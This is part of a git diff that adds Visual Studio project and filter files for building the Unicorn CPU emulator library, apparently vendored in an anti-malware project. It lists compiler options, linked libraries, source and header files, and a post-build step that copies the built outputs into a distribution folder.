<AdditionalIncludeDirectories>.;..;../../../include;../../../qemu;../../../qemu/include;../../../qemu/tcg</AdditionalIncludeDirectories> + <AdditionalOptions>/wd4018 /wd4244 /wd4267 %(AdditionalOptions)</AdditionalOptions> + <RuntimeLibrary>MultiThreaded</RuntimeLibrary> + <ExceptionHandling>false</ExceptionHandling> + <DebugInformationFormat>None</DebugInformationFormat> + </ClCompile> + <Link> + <SubSystem>Windows</SubSystem> + <GenerateDebugInformation>true</GenerateDebugInformation> + 
<EnableCOMDATFolding>true</EnableCOMDATFolding> + <OptimizeReferences>true</OptimizeReferences> + <AdditionalDependencies>kernel32.lib;user32.lib;gdi32.lib;winspool.lib;comdlg32.lib;advapi32.lib;shell32.lib;ole32.lib;oleaut32.lib;uuid.lib;odbc32.lib;odbccp32.lib;%(AdditionalDependencies);aarch64-softmmu.lib;aarch64eb-softmmu.lib;arm-softmmu.lib;armeb-softmmu.lib;m68k-softmmu.lib;mips-softmmu.lib;mips64-softmmu.lib;mipsel-softmmu.lib;mips64el-softmmu.lib;sparc-softmmu.lib;sparc64-softmmu.lib;x86_64-softmmu.lib</AdditionalDependencies> + <AdditionalLibraryDirectories>$(SolutionDir)$(Platform)\$(Configuration)\</AdditionalLibraryDirectories> + </Link> + <PostBuildEvent> + <Command>mkdir "$(SolutionDir)distro\" +mkdir "$(SolutionDir)distro\include" +mkdir "$(SolutionDir)distro\include\unicorn" +mkdir "$(SolutionDir)distro\$(Platform)" + +copy "$(SolutionDir)$(Platform)\$(Configuration)\$(ProjectName).dll" "$(SolutionDir)distro\$(Platform)\" +copy "$(SolutionDir)$(Platform)\$(Configuration)\$(ProjectName).lib" "$(SolutionDir)distro\$(Platform)\" + +copy "$(SolutionDir)..\include\unicorn\*.h" "$(SolutionDir)distro\include\unicorn\" +</Command> + </PostBuildEvent> + </ItemDefinitionGroup> + <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'"> + <ClCompile> + <WarningLevel>Level3</WarningLevel> + <PrecompiledHeader>NotUsing</PrecompiledHeader> + <Optimization>MaxSpeed</Optimization> + <FunctionLevelLinking>true</FunctionLevelLinking> + <IntrinsicFunctions>true</IntrinsicFunctions> + <PreprocessorDefinitions>WIN32;NDEBUG;_WINDOWS;_USRDLL;UNICORN_DLL_EXPORTS;UNICORN_SHARED;%(PreprocessorDefinitions);_CRT_SECURE_NO_WARNINGS;inline=__inline;__func__=__FUNCTION__;__x86_64__;UNICORN_HAS_ARM;UNICORN_HAS_ARM64;UNICORN_HAS_M68K;UNICORN_HAS_MIPS;UNICORN_HAS_MIPS64;UNICORN_HAS_MIPSEL;UNICORN_HAS_MIPS64EL;UNICORN_HAS_SPARC;UNICORN_HAS_X86;WIN32_LEAN_AND_MEAN</PreprocessorDefinitions> + 
<AdditionalIncludeDirectories>.;..;../../../include;../../../qemu;../../../qemu/include;../../../qemu/tcg</AdditionalIncludeDirectories> + <AdditionalOptions>/wd4018 /wd4244 /wd4267 %(AdditionalOptions)</AdditionalOptions> + <RuntimeLibrary>MultiThreaded</RuntimeLibrary> + <ExceptionHandling>false</ExceptionHandling> + <DebugInformationFormat>None</DebugInformationFormat> + </ClCompile> + <Link> + <SubSystem>Windows</SubSystem> + <GenerateDebugInformation>true</GenerateDebugInformation> + <EnableCOMDATFolding>true</EnableCOMDATFolding> + <OptimizeReferences>true</OptimizeReferences> + <AdditionalDependencies>kernel32.lib;user32.lib;gdi32.lib;winspool.lib;comdlg32.lib;advapi32.lib;shell32.lib;ole32.lib;oleaut32.lib;uuid.lib;odbc32.lib;odbccp32.lib;%(AdditionalDependencies);aarch64-softmmu.lib;aarch64eb-softmmu.lib;arm-softmmu.lib;armeb-softmmu.lib;m68k-softmmu.lib;mips-softmmu.lib;mips64-softmmu.lib;mipsel-softmmu.lib;mips64el-softmmu.lib;sparc-softmmu.lib;sparc64-softmmu.lib;x86_64-softmmu.lib</AdditionalDependencies> + <AdditionalLibraryDirectories>$(SolutionDir)$(Platform)\$(Configuration)\</AdditionalLibraryDirectories> + </Link> + <PostBuildEvent> + <Command>mkdir "$(SolutionDir)distro\" +mkdir "$(SolutionDir)distro\include" +mkdir "$(SolutionDir)distro\include\unicorn" +mkdir "$(SolutionDir)distro\$(Platform)" + +copy "$(SolutionDir)$(Platform)\$(Configuration)\$(ProjectName).dll" "$(SolutionDir)distro\$(Platform)\" +copy "$(SolutionDir)$(Platform)\$(Configuration)\$(ProjectName).lib" "$(SolutionDir)distro\$(Platform)\" + +copy "$(SolutionDir)..\include\unicorn\*.h" "$(SolutionDir)distro\include\unicorn\" +</Command> + </PostBuildEvent> + </ItemDefinitionGroup> + <ItemGroup> + <ClCompile Include="..\..\..\list.c" /> + <ClCompile Include="..\..\..\qemu\accel.c" /> + <ClCompile Include="..\..\..\qemu\glib_compat.c" /> + <ClCompile Include="..\..\..\qemu\hw\core\machine.c" /> + <ClCompile Include="..\..\..\qemu\hw\core\qdev.c" /> + <ClCompile 
Include="..\..\..\qemu\qapi\qapi-dealloc-visitor.c" /> + <ClCompile Include="..\..\..\qemu\qapi\qapi-visit-core.c" /> + <ClCompile Include="..\..\..\qemu\qapi\qmp-input-visitor.c" /> + <ClCompile Include="..\..\..\qemu\qapi\qmp-output-visitor.c" /> + <ClCompile Include="..\..\..\qemu\qapi\string-input-visitor.c" /> + <ClCompile Include="..\..\..\qemu\qemu-log.c" /> + <ClCompile Include="..\..\..\qemu\qemu-timer.c" /> + <ClCompile Include="..\..\..\qemu\qobject\qbool.c" /> + <ClCompile Include="..\..\..\qemu\qobject\qdict.c" /> + <ClCompile Include="..\..\..\qemu\qobject\qerror.c" /> + <ClCompile Include="..\..\..\qemu\qobject\qfloat.c" /> + <ClCompile Include="..\..\..\qemu\qobject\qint.c" /> + <ClCompile Include="..\..\..\qemu\qobject\qlist.c" /> + <ClCompile Include="..\..\..\qemu\qobject\qstring.c" /> + <ClCompile Include="..\..\..\qemu\qom\container.c" /> + <ClCompile Include="..\..\..\qemu\qom\cpu.c" /> + <ClCompile Include="..\..\..\qemu\qom\object.c" /> + <ClCompile Include="..\..\..\qemu\qom\qom-qobject.c" /> + <ClCompile Include="..\..\..\qemu\tcg-runtime.c" /> + <ClCompile Include="..\..\..\qemu\util\aes.c" /> + <ClCompile Include="..\..\..\qemu\util\bitmap.c" /> + <ClCompile Include="..\..\..\qemu\util\bitops.c" /> + <ClCompile Include="..\..\..\qemu\util\crc32c.c" /> + <ClCompile Include="..\..\..\qemu\util\cutils.c" /> + <ClCompile Include="..\..\..\qemu\util\error.c" /> + <ClCompile Include="..\..\..\qemu\util\getauxval.c" /> + <ClCompile Include="..\..\..\qemu\util\host-utils.c" /> + <ClCompile Include="..\..\..\qemu\util\module.c" /> + <ClCompile Include="..\..\..\qemu\util\oslib-win32.c" /> + <ClCompile Include="..\..\..\qemu\util\qemu-error.c" /> + <ClCompile Include="..\..\..\qemu\util\qemu-thread-win32.c" /> + <ClCompile Include="..\..\..\qemu\util\qemu-timer-common.c" /> + <ClCompile Include="..\..\..\qemu\vl.c" /> + <ClCompile Include="..\..\..\uc.c" /> + <ClCompile Include="..\qapi-types.c" /> + <ClCompile Include="..\qapi-visit.c" /> + 
<ClCompile Include="dllmain.cpp"> + <CompileAsManaged Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">false</CompileAsManaged> + <CompileAsManaged Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">false</CompileAsManaged> + <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'"> + </PrecompiledHeader> + <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Debug|x64'"> + </PrecompiledHeader> + <CompileAsManaged Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">false</CompileAsManaged> + <CompileAsManaged Condition="'$(Configuration)|$(Platform)'=='Release|x64'">false</CompileAsManaged> + <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Release|Win32'"> + </PrecompiledHeader> + <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Release|x64'"> + </PrecompiledHeader> + </ClCompile> + </ItemGroup> + <ItemGroup> + <ClInclude Include="..\..\..\include\list.h" /> + <ClInclude Include="..\..\..\include\qemu.h" /> + <ClInclude Include="..\..\..\include\uc_priv.h" /> + <ClInclude Include="..\..\..\include\unicorn\arm.h" /> + <ClInclude Include="..\..\..\include\unicorn\arm64.h" /> + <ClInclude Include="..\..\..\include\unicorn\m68k.h" /> + <ClInclude Include="..\..\..\include\unicorn\mips.h" /> + <ClInclude Include="..\..\..\include\unicorn\platform.h" /> + <ClInclude Include="..\..\..\include\unicorn\sparc.h" /> + <ClInclude Include="..\..\..\include\unicorn\unicorn.h" /> + <ClInclude Include="..\..\..\include\unicorn\x86.h" /> + <ClInclude Include="..\..\..\qemu\include\config.h" /> + <ClInclude Include="..\..\..\qemu\include\elf.h" /> + <ClInclude Include="..\..\..\qemu\include\exec\address-spaces.h" /> + <ClInclude Include="..\..\..\qemu\include\exec\cpu-all.h" /> + <ClInclude Include="..\..\..\qemu\include\exec\cpu-common.h" /> + <ClInclude Include="..\..\..\qemu\include\exec\cpu-defs.h" /> + <ClInclude Include="..\..\..\qemu\include\exec\cputlb.h" /> + <ClInclude 
Include="..\..\..\qemu\include\exec\cpu_ldst.h" /> + <ClInclude Include="..\..\..\qemu\include\exec\cpu_ldst_template.h" /> + <ClInclude Include="..\..\..\qemu\include\exec\exec-all.h" /> + <ClInclude Include="..\..\..\qemu\include\exec\gen-icount.h" /> + <ClInclude Include="..\..\..\qemu\include\exec\helper-gen.h" /> + <ClInclude Include="..\..\..\qemu\include\exec\helper-head.h" /> + <ClInclude Include="..\..\..\qemu\include\exec\helper-proto.h" /> + <ClInclude Include="..\..\..\qemu\include\exec\helper-tcg.h" /> + <ClInclude Include="..\..\..\qemu\include\exec\hwaddr.h" /> + <ClInclude Include="..\..\..\qemu\include\exec\ioport.h" /> + <ClInclude Include="..\..\..\qemu\include\exec\memory-internal.h" /> + <ClInclude Include="..\..\..\qemu\include\exec\memory.h" /> + <ClInclude Include="..\..\..\qemu\include\exec\poison.h" /> + <ClInclude Include="..\..\..\qemu\include\exec\ram_addr.h" /> + <ClInclude Include="..\..\..\qemu\include\exec\softmmu-semi.h" /> + <ClInclude Include="..\..\..\qemu\include\exec\spinlock.h" /> + <ClInclude Include="..\..\..\qemu\include\fpu\softfloat.h" /> + <ClInclude Include="..\..\..\qemu\include\glib_compat.h" /> + <ClInclude Include="..\..\..\qemu\include\hw\arm\arm.h" /> + <ClInclude Include="..\..\..\qemu\include\hw\boards.h" /> + <ClInclude Include="..\..\..\qemu\include\hw\cpu\icc_bus.h" /> + <ClInclude Include="..\..\..\qemu\include\hw\hw.h" /> + <ClInclude Include="..\..\..\qemu\include\hw\i386\apic.h" /> + <ClInclude Include="..\..\..\qemu\include\hw\i386\apic_internal.h" /> + <ClInclude Include="..\..\..\qemu\include\hw\i386\pc.h" /> + <ClInclude Include="..\..\..\qemu\include\hw\irq.h" /> + <ClInclude Include="..\..\..\qemu\include\hw\m68k\m68k.h" /> + <ClInclude Include="..\..\..\qemu\include\hw\m68k\mcf.h" /> + <ClInclude Include="..\..\..\qemu\include\hw\mips\bios.h" /> + <ClInclude Include="..\..\..\qemu\include\hw\mips\cpudevs.h" /> + <ClInclude Include="..\..\..\qemu\include\hw\mips\mips.h" /> + <ClInclude 
Include="..\..\..\qemu\include\hw\qdev-core.h" /> + <ClInclude Include="..\..\..\qemu\include\hw\qdev.h" /> + <ClInclude Include="..\..\..\qemu\include\hw\sparc\grlib.h" /> + <ClInclude Include="..\..\..\qemu\include\hw\sparc\sparc.h" /> + <ClInclude Include="..\..\..\qemu\include\hw\sparc\sparc32_dma.h" /> + <ClInclude Include="..\..\..\qemu\include\hw\sparc\sun4m.h" /> + <ClInclude Include="..\..\..\qemu\include\qapi\dealloc-visitor.h" /> + <ClInclude Include="..\..\..\qemu\include\qapi\error.h" /> + <ClInclude Include="..\..\..\qemu\include\qapi\opts-visitor.h" /> + <ClInclude Include="..\..\..\qemu\include\qapi\qmp-input-visitor.h" /> + <ClInclude Include="..\..\..\qemu\include\qapi\qmp-output-visitor.h" /> + <ClInclude Include="..\..\..\qemu\include\qapi\qmp\qbool.h" /> + <ClInclude Include="..\..\..\qemu\include\qapi\qmp\qdict.h" /> + <ClInclude Include="..\..\..\qemu\include\qapi\qmp\qerror.h" /> + <ClInclude Include="..\..\..\qemu\include\qapi\qmp\qfloat.h" /> + <ClInclude Include="..\..\..\qemu\include\qapi\qmp\qint.h" /> + <ClInclude Include="..\..\..\qemu\include\qapi\qmp\qjson.h" /> + <ClInclude Include="..\..\..\qemu\include\qapi\qmp\qlist.h" /> + <ClInclude Include="..\..\..\qemu\include\qapi\qmp\qobject.h" /> + <ClInclude Include="..\..\..\qemu\include\qapi\qmp\qstring.h" /> + <ClInclude Include="..\..\..\qemu\include\qapi\qmp\types.h" /> + <ClInclude Include="..\..\..\qemu\include\qapi\string-input-visitor.h" /> + <ClInclude Include="..\..\..\qemu\include\qapi\visitor-impl.h" /> + <ClInclude Include="..\..\..\qemu\include\qapi\visitor.h" /> + <ClInclude Include="..\..\..\qemu\include\qemu-common.h" /> + <ClInclude Include="..\..\..\qemu\include\qemu\aes.h" /> + <ClInclude Include="..\..\..\qemu\include\qemu\atomic.h" /> + <ClInclude Include="..\..\..\qemu\include\qemu\bitmap.h" /> + <ClInclude Include="..\..\..\qemu\include\qemu\bitops.h" /> + <ClInclude Include="..\..\..\qemu\include\qemu\bswap.h" /> + <ClInclude 
Include="..\..\..\qemu\include\qemu\compiler.h" /> + <ClInclude Include="..\..\..\qemu\include\qemu\crc32c.h" /> + <ClInclude Include="..\..\..\qemu\include\qemu\host-utils.h" /> + <ClInclude Include="..\..\..\qemu\include\qemu\int128.h" /> + <ClInclude Include="..\..\..\qemu\include\qemu\log.h" /> + <ClInclude Include="..\..\..\qemu\include\qemu\module.h" /> + <ClInclude Include="..\..\..\qemu\include\qemu\notify.h" /> + <ClInclude Include="..\..\..\qemu\include\qemu\osdep.h" /> + <ClInclude Include="..\..\..\qemu\include\qemu\queue.h" /> + <ClInclude Include="..\..\..\qemu\include\qemu\range.h" /> + <ClInclude Include="..\..\..\qemu\include\qemu\thread-posix.h" /> + <ClInclude Include="..\..\..\qemu\include\qemu\thread-win32.h" /> + <ClInclude Include="..\..\..\qemu\include\qemu\thread.h" /> + <ClInclude Include="..\..\..\qemu\include\qemu\timer.h" /> + <ClInclude Include="..\..\..\qemu\include\qemu\typedefs.h" /> + <ClInclude Include="..\..\..\qemu\include\qom\cpu.h" /> + <ClInclude Include="..\..\..\qemu\include\qom\object.h" /> + <ClInclude Include="..\..\..\qemu\include\qom\qom-qobject.h" /> + <ClInclude Include="..\..\..\qemu\include\sysemu\accel.h" /> + <ClInclude Include="..\..\..\qemu\include\sysemu\cpus.h" /> + <ClInclude Include="..\..\..\qemu\include\sysemu\memory_mapping.h" /> + <ClInclude Include="..\..\..\qemu\include\sysemu\os-win32.h" /> + <ClInclude Include="..\..\..\qemu\include\sysemu\sysemu.h" /> + <ClInclude Include="..\..\..\qemu\vl.h" /> + <ClInclude Include="..\config-host.h" /> + <ClInclude Include="..\qapi-types.h" /> + <ClInclude Include="..\qapi-visit.h" /> + </ItemGroup> + <ItemGroup> + <MASM Include="..\..\..\qemu\util\setjmp-wrapper-win32.asm"> + <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">true</ExcludedFromBuild> + <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">true</ExcludedFromBuild> + <ExcludedFromBuild 
Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">false</ExcludedFromBuild> + <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Release|x64'">false</ExcludedFromBuild> + </MASM> + </ItemGroup> + <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" /> + <ImportGroup Label="ExtensionTargets"> + <Import Project="$(VCTargetsPath)\BuildCustomizations\masm.targets" /> + </ImportGroup> +</Project> \ No newline at end of file diff --git a/ai_anti_malware/unicorn/unicorn-master/msvc/unicorn/unicorn/unicorn.vcxproj.filters b/ai_anti_malware/unicorn/unicorn-master/msvc/unicorn/unicorn/unicorn.vcxproj.filters new file mode 100644 index 0000000..da3121f --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/msvc/unicorn/unicorn/unicorn.vcxproj.filters @@ -0,0 +1,505 @@ +<?xml version="1.0" encoding="utf-8"?> +<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> + <ItemGroup> + <ClCompile Include="dllmain.cpp" /> + <ClCompile Include="..\..\..\list.c"> + <Filter>priv</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\accel.c"> + <Filter>qemu</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\glib_compat.c"> + <Filter>qemu</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\qemu-log.c"> + <Filter>qemu</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\qemu-timer.c"> + <Filter>qemu</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\tcg-runtime.c"> + <Filter>qemu</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\vl.c"> + <Filter>qemu</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\util\aes.c"> + <Filter>qemu\util</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\util\bitmap.c"> + <Filter>qemu\util</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\util\bitops.c"> + <Filter>qemu\util</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\util\crc32c.c"> + <Filter>qemu\util</Filter> + </ClCompile> + <ClCompile 
Include="..\..\..\qemu\util\cutils.c"> + <Filter>qemu\util</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\util\error.c"> + <Filter>qemu\util</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\util\getauxval.c"> + <Filter>qemu\util</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\util\host-utils.c"> + <Filter>qemu\util</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\util\module.c"> + <Filter>qemu\util</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\util\oslib-win32.c"> + <Filter>qemu\util</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\util\qemu-error.c"> + <Filter>qemu\util</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\util\qemu-thread-win32.c"> + <Filter>qemu\util</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\util\qemu-timer-common.c"> + <Filter>qemu\util</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\hw\core\machine.c"> + <Filter>qemu\hw\core</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\hw\core\qdev.c"> + <Filter>qemu\hw\core</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\qapi\qapi-dealloc-visitor.c"> + <Filter>qemu\qapi</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\qapi\qapi-visit-core.c"> + <Filter>qemu\qapi</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\qapi\qmp-input-visitor.c"> + <Filter>qemu\qapi</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\qapi\qmp-output-visitor.c"> + <Filter>qemu\qapi</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\qapi\string-input-visitor.c"> + <Filter>qemu\qapi</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\qobject\qbool.c"> + <Filter>qemu\qobject</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\qobject\qdict.c"> + <Filter>qemu\qobject</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\qobject\qerror.c"> + <Filter>qemu\qobject</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\qobject\qfloat.c"> + 
<Filter>qemu\qobject</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\qobject\qint.c"> + <Filter>qemu\qobject</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\qobject\qlist.c"> + <Filter>qemu\qobject</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\qobject\qstring.c"> + <Filter>qemu\qobject</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\qom\container.c"> + <Filter>qemu\qom</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\qom\cpu.c"> + <Filter>qemu\qom</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\qom\object.c"> + <Filter>qemu\qom</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\qom\qom-qobject.c"> + <Filter>qemu\qom</Filter> + </ClCompile> + <ClCompile Include="..\..\..\uc.c" /> + <ClCompile Include="..\qapi-types.c"> + <Filter>qemu</Filter> + </ClCompile> + <ClCompile Include="..\qapi-visit.c"> + <Filter>qemu</Filter> + </ClCompile> + </ItemGroup> + <ItemGroup> + <Filter Include="priv"> + <UniqueIdentifier>{1d58ccd1-7ea5-40e0-ba38-304ac34bf08e}</UniqueIdentifier> + </Filter> + <Filter Include="qemu"> + <UniqueIdentifier>{438f79b0-21e5-4a21-8e61-271b88a3130d}</UniqueIdentifier> + </Filter> + <Filter Include="qemu\util"> + <UniqueIdentifier>{88e75519-13ca-431e-8b6d-d915d5e12231}</UniqueIdentifier> + </Filter> + <Filter Include="qemu\hw"> + <UniqueIdentifier>{669d34d7-8f38-47ac-ac1b-1f485bc9d6eb}</UniqueIdentifier> + </Filter> + <Filter Include="qemu\hw\core"> + <UniqueIdentifier>{2182308b-b1c8-4ac4-a779-c9d86c3cf97d}</UniqueIdentifier> + </Filter> + <Filter Include="qemu\qapi"> + <UniqueIdentifier>{70273f5a-23c0-4274-acc8-0c398ec327e7}</UniqueIdentifier> + </Filter> + <Filter Include="qemu\qobject"> + <UniqueIdentifier>{b84e89c5-c18f-4505-a2b9-b6cacbf97d1a}</UniqueIdentifier> + </Filter> + <Filter Include="qemu\qom"> + <UniqueIdentifier>{c0e7454f-a22a-4410-87e9-bd8668a2fc5b}</UniqueIdentifier> + </Filter> + <Filter Include="qemu\include"> + 
<UniqueIdentifier>{0d15a173-37a6-4507-a128-de4316618e68}</UniqueIdentifier> + </Filter> + <Filter Include="qemu\include\exec"> + <UniqueIdentifier>{fcbdd971-b481-4edc-a96a-3cdaeeadf2e9}</UniqueIdentifier> + </Filter> + <Filter Include="qemu\include\fpu"> + <UniqueIdentifier>{01269629-99a8-41ee-9595-b1c745b1a044}</UniqueIdentifier> + </Filter> + <Filter Include="qemu\include\hw"> + <UniqueIdentifier>{e1755d99-2324-43b4-9896-2400610e0b31}</UniqueIdentifier> + </Filter> + <Filter Include="qemu\include\hw\arm"> + <UniqueIdentifier>{daf8ad72-5390-43b2-8c7b-082ce1084aed}</UniqueIdentifier> + </Filter> + <Filter Include="qemu\include\hw\cpu"> + <UniqueIdentifier>{da199412-30ad-4c72-9a5a-a7b280c00021}</UniqueIdentifier> + </Filter> + <Filter Include="qemu\include\hw\i386"> + <UniqueIdentifier>{5f01eb28-ffe0-4371-a677-32ded26a33e2}</UniqueIdentifier> + </Filter> + <Filter Include="qemu\include\hw\m68k"> + <UniqueIdentifier>{dfebfef7-1435-4d09-89f6-94fb929f3488}</UniqueIdentifier> + </Filter> + <Filter Include="qemu\include\hw\mips"> + <UniqueIdentifier>{969bee88-382e-4c05-9205-074f24bdaf82}</UniqueIdentifier> + </Filter> + <Filter Include="qemu\include\hw\sparc"> + <UniqueIdentifier>{7195ce60-b300-4dbe-8072-3e812167a036}</UniqueIdentifier> + </Filter> + <Filter Include="qemu\include\qapi"> + <UniqueIdentifier>{0f13072a-571c-4c81-bef3-513758b38832}</UniqueIdentifier> + </Filter> + <Filter Include="qemu\include\qapi\qmp"> + <UniqueIdentifier>{0ae19983-bbd0-448f-a319-574d45f59dfe}</UniqueIdentifier> + </Filter> + <Filter Include="qemu\include\qemu"> + <UniqueIdentifier>{5653dd50-a557-4573-8f43-7ef26d0d4190}</UniqueIdentifier> + </Filter> + <Filter Include="qemu\include\qom"> + <UniqueIdentifier>{36443fca-61fc-4f64-a872-2ddd3d823cb9}</UniqueIdentifier> + </Filter> + <Filter Include="qemu\include\sysemu"> + <UniqueIdentifier>{5e47a1c2-85ab-48d6-921e-8915438c2cbf}</UniqueIdentifier> + </Filter> + </ItemGroup> + <ItemGroup> + <ClInclude Include="..\..\..\include\list.h"> + 
<Filter>priv</Filter> + </ClInclude> + <ClInclude Include="..\..\..\include\qemu.h"> + <Filter>priv</Filter> + </ClInclude> + <ClInclude Include="..\..\..\include\uc_priv.h"> + <Filter>priv</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\vl.h"> + <Filter>qemu</Filter> + </ClInclude> + <ClInclude Include="..\config-host.h"> + <Filter>qemu</Filter> + </ClInclude> + <ClInclude Include="..\qapi-types.h"> + <Filter>qemu</Filter> + </ClInclude> + <ClInclude Include="..\qapi-visit.h"> + <Filter>qemu</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\config.h"> + <Filter>qemu\include</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\elf.h"> + <Filter>qemu\include</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\glib_compat.h"> + <Filter>qemu\include</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\qemu-common.h"> + <Filter>qemu\include</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\exec\address-spaces.h"> + <Filter>qemu\include\exec</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\exec\cpu-all.h"> + <Filter>qemu\include\exec</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\exec\cpu-common.h"> + <Filter>qemu\include\exec</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\exec\cpu-defs.h"> + <Filter>qemu\include\exec</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\exec\cputlb.h"> + <Filter>qemu\include\exec</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\exec\cpu_ldst.h"> + <Filter>qemu\include\exec</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\exec\cpu_ldst_template.h"> + <Filter>qemu\include\exec</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\exec\exec-all.h"> + <Filter>qemu\include\exec</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\exec\gen-icount.h"> + <Filter>qemu\include\exec</Filter> + </ClInclude> + 
<ClInclude Include="..\..\..\qemu\include\exec\helper-gen.h"> + <Filter>qemu\include\exec</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\exec\helper-head.h"> + <Filter>qemu\include\exec</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\exec\helper-proto.h"> + <Filter>qemu\include\exec</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\exec\helper-tcg.h"> + <Filter>qemu\include\exec</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\exec\hwaddr.h"> + <Filter>qemu\include\exec</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\exec\ioport.h"> + <Filter>qemu\include\exec</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\exec\memory-internal.h"> + <Filter>qemu\include\exec</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\exec\memory.h"> + <Filter>qemu\include\exec</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\exec\poison.h"> + <Filter>qemu\include\exec</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\exec\ram_addr.h"> + <Filter>qemu\include\exec</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\exec\softmmu-semi.h"> + <Filter>qemu\include\exec</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\exec\spinlock.h"> + <Filter>qemu\include\exec</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\fpu\softfloat.h"> + <Filter>qemu\include\fpu</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\hw\boards.h"> + <Filter>qemu\include\hw</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\hw\hw.h"> + <Filter>qemu\include\hw</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\hw\irq.h"> + <Filter>qemu\include\hw</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\hw\qdev-core.h"> + <Filter>qemu\include\hw</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\hw\qdev.h"> + 
